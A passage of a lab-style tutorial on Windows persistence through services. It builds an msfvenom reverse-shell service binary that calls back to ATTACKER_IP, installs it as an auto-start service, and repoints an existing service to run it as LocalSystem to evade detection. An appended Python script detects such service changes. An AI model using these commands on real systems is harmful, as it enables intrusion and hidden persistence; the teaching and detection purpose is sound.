
Abusing Services

A service is basically an executable that runs in the background. When configuring a service, you define which executable will be used and whether the service runs automatically when the machine starts or must be started manually.

Creating backdoor services

First, let's create a reverse shell using msfvenom.

user@AttackBox$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe

Transfer and save this reverse shell into c:\windows and create a new service pointing to it.

sc.exe create newservice binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start newservice

Modifying existing services

Instead of creating a new service, we can reuse an existing service to avoid detection.

List the available services using:

C:\> sc.exe query state=all

After finding the desired service, query its configuration:

C:\> sc.exe qc newservice
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: THMService3
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2 AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\MyService\newservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : newservice
        DEPENDENCIES       : 
        SERVICE_START_NAME : NT AUTHORITY\Local Service

The key fields to look at here are:

  • START_TYPE

  • BINARY_PATH_NAME

  • SERVICE_START_NAME

This service automatically executes C:\MyService\newservice.exe under the LocalService (low privilege) account.

Let's change the binary path to point to the reverse shell executable we created using msfvenom and run it as LocalSystem (highest privilege).

Then we can stop and start the service as
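Added example, not part of the original page: a defender-side check that parses `sc.exe qc` output and compares the three fields highlighted above against a saved baseline, flagging the binary-path and service-account change this section describes. The function names and the "modified" sample output are constructed for illustration; the baseline is abridged from the output shown above.

```python
import re

# Fields the page highlights in `sc.exe qc` output.
WATCHED = ("START_TYPE", "BINARY_PATH_NAME", "SERVICE_START_NAME")

# Baseline: abridged from the `sc.exe qc` output shown on this page.
BASELINE = r"""
SERVICE_NAME: THMService3
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2 AUTO_START
        BINARY_PATH_NAME   : C:\MyService\newservice.exe
        SERVICE_START_NAME : NT AUTHORITY\Local Service
"""

# Constructed sample: the same service after the change described above.
MODIFIED = r"""
SERVICE_NAME: THMService3
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\windows\rev-svc.exe
        SERVICE_START_NAME : LocalSystem
"""

def parse_sc_qc(text):
    """Parse `sc.exe qc` output into {FIELD: value}."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

def norm(value):
    """Collapse whitespace and case so cosmetic differences are ignored."""
    return " ".join(value.split()).lower()

def audit_service(baseline, current):
    """Return findings for watched fields that drifted from the baseline."""
    findings = []
    for field in WATCHED:
        old, new = baseline.get(field, ""), current.get(field, "")
        if norm(old) != norm(new):
            findings.append(f"{field} changed: {old!r} -> {new!r}")
    acct_old = norm(baseline.get("SERVICE_START_NAME", ""))
    acct_new = norm(current.get("SERVICE_START_NAME", ""))
    if acct_new == "localsystem" and acct_old != "localsystem":
        findings.append("service account escalated to LocalSystem")
    return findings

if __name__ == "__main__":
    for finding in audit_service(parse_sc_qc(BASELINE), parse_sc_qc(MODIFIED)):
        print(finding)
```

Running the same comparison on a schedule against every service's stored `sc.exe qc` snapshot surfaces a repointed binary even when the service name and display name are unchanged.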
